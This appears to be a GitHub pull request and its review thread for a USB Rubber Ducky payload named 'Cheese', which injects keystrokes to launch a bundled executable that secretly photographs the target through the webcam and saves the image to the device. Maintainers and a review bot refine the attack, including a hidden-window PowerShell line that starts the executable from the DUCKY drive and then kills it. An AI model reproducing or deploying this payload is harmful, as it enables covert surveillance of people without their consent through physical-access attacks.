web cam photo taker #438

Open
wants to merge 1 commit into
base: master

ping-oui-no

It is a script that will launch the binary, which will take a web cam photo and save it to ducky

REM the ALF F4 is only if the target had autorun which will pop the Ducky folder

ATTACKMODE HID STORAGE
DELAY 5000
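
Review bot: the REM comment on the first line of this hunk has what looks like a typo, "ALF F4" for "ALT F4", and "had autorun" should read "has autorun enabled". No ALT F4 keystroke appears in these lines, so the comment should also say which step of the payload it refers to, or sit directly above that step.
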
Member

Consider using EXTENSION PASSIVE_WINDOWS_DETECT. The extension allows the USB Rubber Ducky to detect when the target is accepting keystrokes, removing the need for a long start delay. It also allows you to add a guard statement to ensure the target is Windows.

For example:

IF ($_OS != WINDOWS)
    LED_R
    STOP_PAYLOAD
END_IF

DELAY 2000
GUI r
DELAY 1000
STRINGLN powershell -WindowStyle Hidden Start-Process -FilePath ((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter + ':\cheese.exe'); Start-Sleep -Seconds 7; taskkill /F /IM cheese.exe
Member

Consider using DEFINE at the start of your payload for the executable name. If the user changes cheese.exe to something different, this allows the user to easily modify the script. Also consider adding a DEFINE for those who may not be using the default drive label of "DUCKY".

For example, you can add this to the top of your payload:
DEFINE #EXE_NAME cheese.exe
DEFINE #DUCKY_DRIVE_LABEL DUCKY

and modify line 14 with:

STRINGLN powershell -WindowStyle Hidden Start-Process -FilePath ((Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter + ':\#EXE_NAME'); Start-Sleep -Seconds 7; taskkill /F /IM #EXE_NAME

@@ -0,0 +1,9 @@
## About:
* Title: Cheese
* Description: Cheese is a Rubber Ducky Script that will execute cheese.exe which will take a photo from the webcam and save it to rubber ducky.
Member

While the transparency is appreciated by adding the source code, it is non-trivial for an end user to verify that the exe provided is actually compiled from the source code provided; because of this, unfortunately, compiled binaries are not allowed as a matter of policy. Instead, I would recommend either adding instructions in the README on how to compile the source code provided, or finding an alternative approach that uses built-in utilities rather than bringing your own executable.


if (usbDriveLetter == "")
{
Console.WriteLine("USB drive 'DUCKY' not found.");
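
Review bot: the `if (usbDriveLetter == "")` check only matches an empty string, so a null value would skip this branch; `string.IsNullOrEmpty(usbDriveLetter)` covers both cases. The message on the `Console.WriteLine` line also hardcodes the label 'DUCKY', which becomes misleading as soon as the label being looked up differs; build the message from the same label value the lookup uses.
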
Member

Consider not everyone's drive is named DUCKY

hak5peaks added the "pending requested changes" (requires changes before merge) label on May 22, 2024